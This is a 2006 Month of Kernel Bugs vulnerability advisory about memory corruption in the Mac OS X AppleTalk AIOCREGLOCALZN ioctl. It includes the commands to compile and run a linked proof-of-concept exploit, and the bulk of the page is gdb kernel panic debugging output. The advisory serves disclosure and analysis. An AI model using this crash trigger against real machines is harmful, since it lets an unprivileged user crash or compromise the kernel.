MOKB-27-11-2006 OMG! PWNIES! M4C BUGS NOW COME IN P1NK!

Bug details
Title: Mac OS X AppleTalk AIOCREGLOCALZN Ioctl Memory Corruption OMG! PWNIES! DADDY I WANT M4C P0NYMONK3YS!
Description: Mac OS X AppleTalk protocol handling code is vulnerable to an exploitable memory corruption issue. This particular vulnerability is caused by failure to validate input data in the AIOCREGLOCALZN ioctl command, and can be abused by unprivileged users by opening an AppleTalk socket and issuing the ioctl control command with a crafted data structure.
Author/Contributor: NA<NA[at] info-pull.com> - discovery, MoKB release, debugging.
References:
Proof of concept or exploit: The following proof of concept / exploit can be used to reproduce the bug (requires Xcode/GNU GCC compiler to be installed): MOKB-27-11-2006.c (x86)
gcc MOKB-27-11-2006.c -o  MOKB-27-11-2006 && ./MOKB-27-11-2006
Note: AppleTalk stack must have been started:
sudo appletalk -u en0
Debugging information:

It's been tested on an up-to-date (27-11-2006) Mac OS X installation, running on an Intel "shipping" Mac (x86).


alkali:/tmpNA $ gdb /Volumes/KernelDebugKit/mach_kernel -c core-xnu-792.13.8-172.16.0.10-a16a4845
GNU gdb 6.3.50-20050815 (Apple version gdb-573) (Fri Oct 20 15:50:43 GMT 2006)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-apple-darwin"...
#0  Debugger (message=0x3c9540 "panic") at /SourceCache/xnu/xnu-792.13.8/osfmk/i386/AT386/model_dep.c:770
Line number 770 out of range; /SourceCache/xnu/xnu-792.13.8/osfmk/i386/AT386/model_dep.c has 312 lines.
(gdb) source /Volumes/KernelDebugKit/kgmacros
Loading Kernel GDB Macros package.  Type "help kgm" for more info.

(gdb) paniclog
panic(cpu 1 caller 0x001A3135): Unresolved kernel trap (CPU 1, Type 14=page fault), registers:
CR0: 0x80010033, CR2: 0x00000000, CR3: 0x00d72000, CR4: 0x000006e0
EAX: 0x00000000, EBX: 0x00000000, ECX: 0x000000f4, EDX: 0x000000f5
CR2: 0x00000000, EBP: 0x00000000, ESI: 0x00000000, EDI: 0x00000000
EFL: 0x00010206, EIP: 0x00000000, CS:  0x00000004, DS:  0x0000000c

Backtrace, Format - Frame : Return Address (4 potential args on stack)
0x13ef39d8 : 0x128d1f (0x3c9540 0x13ef39fc 0x131df4 0x0)
0x13ef3a18 : 0x1a3135 (0x3cf1f4 0x1 0xe 0x3cea24)
0x13ef3b28 : 0x19a8d4 (0x13ef3b38 0xf457b9e1 0xe 0x39210048) Backtrace terminated-invalid frame pointer 0x0

Kernel version:
Darwin Kernel Version 8.8.1: Mon Sep 25 19:42:00 PDT 2006; root:xnu-792.13.8.obj~1/RELEASE_I386

(gdb) info registers
eax            0x0      0
ecx            0x0      0
edx            0x0      0
ebx            0x1      1
esp            0x13ef394c       0x13ef394c
ebp            0x13ef39d8       0x13ef39d8
esi            0x1      1
edi            0x1000   4096
eip            0x1a8674 0x1a8674 
eflags         0x0      0
cs             0x0      0
ss             0x0      0
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
(gdb) showcurrentstacks
task        vm_map      ipc_space  #acts   pid  proc        command
0x025bfda0  0x013d6f3c  0x02589ef0   45      0  0x004d2200  kernel_task
            activation  thread      pri  state  wait_queue  wait_event
            0x025dec64  0x025dec64    0  IR
                reserved_stack=0x13e10000
                kernel_stack=0x13fe0000
                stacktop=0x13fe3f18
                0x13fe3f18  0x1a42f5 <machine_idle_cstate+32>
                0x13fe3f38  0x19d871 <machine_idle+128>
                0x13fe3f58  0x135f23 <idle_thread+96>
                0x13fe3fc8  0x19a74c <call_continuation+28>
                stackbottom=0x13fe3fc8

task        vm_map      ipc_space  #acts   pid  proc        command
0x025bce60  0x013d67d0  0x02589550    1    188  0x02c1f7d0  appletalk1
            activation  thread      pri  state  wait_queue  wait_event
            0x0272dd08  0x0272dd08   31  R
                kernel_stack=0x13ef0000
                stacktop=0x13ef39d8
                0x13ef39d8  0x128d1f <panic+382>
                0x13ef3a18  0x1a3135 <kernel_trap+1538>
                0x13ef3b28  0x19a8d4 <trap_from_kernel+19>
                stackbottom=0x13ef3b28

(gdb) showmapvme 0x013d67d0
vm_map      pmap        vm_size    #ents rpage  hint        first_free
0x013d67d0  0x025c1d50  0x21a9c000   21     84  0x02c477bc  0x02c771e4
    entry       start               prot #page  object      offset
    0x02bf9688  0x0000000000000000  00C      1  0x00000000  0x0000000000000000
    0x02cdb1b8  0x0000000000001000  57Cn     1  0x02cee2a8  0x0000000000000000
    0x02cdb5ac  0x0000000000002000  33C      1  0x02bb3bb0  0x0000000000000000
    0x02b948c4  0x0000000000003000  33C      1  0x00000000  0x0000000000000000
    0x02b94554  0x0000000000004000  77C      1  0x02cc3d48  0x0000000000000000
    0x02c771e4  0x0000000000005000  13Cn     1  0x02cee2a8  0x0000000000003000
    0x02ce89a0  0x0000000000100000  37C    261  0x02d94908  0x0000000000000000
    0x02c77318  0x0000000000300000  37C    261  0x02e0df68  0x0000000000000000
    0x02d5c0b0  0x0000000000800000  37C   2056  0x02c4a088  0x0000000000000000
    0x02cdb580  0x0000000001800000  37C   2056  0x02886908  0x0000000000000000
    0x02c77294  0x000000008fe00000  57Cn    74  0x027e2770  0x00000000000d4000
    0x02cc25ac  0x000000008fe4a000  37C      7  0x02d94198  0x0000000000000000
    0x02c930dc  0x000000008fe51000  37C      3  0x02c94770  0x0000000000000000
    0x02c80c34  0x000000008fe54000  77Cn     1  0x027e2770  0x0000000000125000
    0x02c77790  0x000000008fe55000  17Cn    20  0x027e2770  0x0000000000126000
    0x02d5e1e4  0x0000000090000000  11Ss 65536  0x013d6ce4  0x0000000000000000
    0x02c477bc  0x00000000a0000000  33C     10  0x02e17990  0x0000000000000000
    0x02c4d4fc  0x00000000a000a000  33C      7  0x02bd0b28  0x0000000000000000
    0x02cc2840  0x00000000a0011000  11Ss 65519  0x013d6c80  0x0000000000011000
    0x02c6c604  0x00000000bf800000  37C   2048  0x02df9ee0  0x0000000000000000
    0x02ce8478  0x00000000fffec000  55-     19  0x025b7660  0x0000000000000000

(gdb) x/24x 0x13ef3b28
0x13ef3b28:     0x00000000      0x0019a8d4      0x13ef3b38      0xf457b9e1
0x13ef3b38:     0x0000000e      0x39210048      0x0000000c      0x0000000c
0x13ef3b48:     0x0000000c      0x00000000      0x00000000      0x00000000
0x13ef3b58:     0x00000000      0x00000000      0x000000f5      0x000000f4
0x13ef3b68:     0x00000000      0x0000000e      0x00000010      0x00000000
0x13ef3b78:     0x00000004      0x00010206      0x00000000      0x00000000	<--
(gdb) x/24x 0x13ef39d8
0x13ef39d8:     0x13ef3a18      0x00128d1f      0x003c9540      0x13ef39fc
0x13ef39e8:     0x00131df4      0x00000000      0x9894bec8      0x0000000e
0x13ef39f8:     0x13ef3a18      0x13ef3a70      0x003d0384      0x0000000e
0x13ef3a08:     0x00000000      0x80010033      0x00000001      0x003cea24  <--
0x13ef3a18:     0x13ef3b28      0x001a3135      0x003cf1f4      0x00000001
0x13ef3a28:     0x0000000e      0x003cea24      0x80010033      0x00000000  <--